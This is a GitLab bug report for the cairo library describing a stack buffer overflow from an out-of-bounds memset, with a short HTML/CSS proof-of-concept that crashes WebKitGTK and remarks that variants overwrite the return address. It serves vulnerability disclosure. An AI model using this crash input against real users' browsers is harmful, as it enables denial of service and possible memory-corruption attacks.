Skip to content
GitLab
Projects Groups Snippets
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
  • Register
  • Sign in
  • C cairo
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributors
    • Graph
    • Compare
  • Issues 337
    • Issues 337
    • List
    • Boards
    • Service Desk
    • Milestones
  • Merge requests 38
    • Merge requests 38
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Schedules
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Container Registry
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar

Due to an influx of spam, we have had to impose restrictions on new accounts. Please see this wiki page for instructions on how to get full permissions. Sorry for the inconvenience.

Update #1:

Due to abusive users subverting our CI facilities to mine cryptocurrency, breaking out of the container sandbox in the process, we have been forced to take actions to limit the usage of the public runners to official projects only.

The policy will be enforced on 2023-03-23 (or before if we detect abuses).

Please see this issue for more context and to see if and how you are impacted.

  • cairo
  • cairo
  • Issues
  • #341
Closed
Open
Issue created Oct 08, 2018 by dwfault@dwfault

Out of bound memset in libcairo result in stack buffer overflow

Hello, I found a bug that could result in a stack buffer overflow in libcairo. This bug was found in the process of fuzzing WebKitGTK. This bug was originally found in cairo-1.14.8, but the recent git commit 06ef6db9 could also make this one reproduceable.

 <style>
   #da {
     border-left: solid 1em;
     border-top-left-radius: 27vmin;
     border-bottom-style: double;
   }
   #ta {
     font-family: 'Calibri';
   }
   :root {
     -webkit-border-end: solid 1px;
     column-width: 1px
   }
 </style>
 <script>
   function js() {
     ta.cols = 38;
   }
 </script>
 <body onload=js()>
   <dialog id="da"><textarea id="ta"/></dialog>
 </body>

cairo-rectanglular-scan-converter.c:

function generate() calls render_rows() and _cairo_image_spans_and_zero() is actually called. With the provided PoC,there are 5 times of the calling before the process crash, among which the last overflow the buffer and rewrite the stack canary. (In some untrimmed PoC, the content also rewrite the return address on stack.)

_cairo_image_spans_and_zero() write zero to stack, but the root cause of the crash could reside in the logic of function generate(). Thus besides DoS, unspecified affect could also exists. This bug was found by ADLab of Venustech.

Edited Nov 05, 2018 by dwfault
To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information
Assignee
Assign to
Time tracking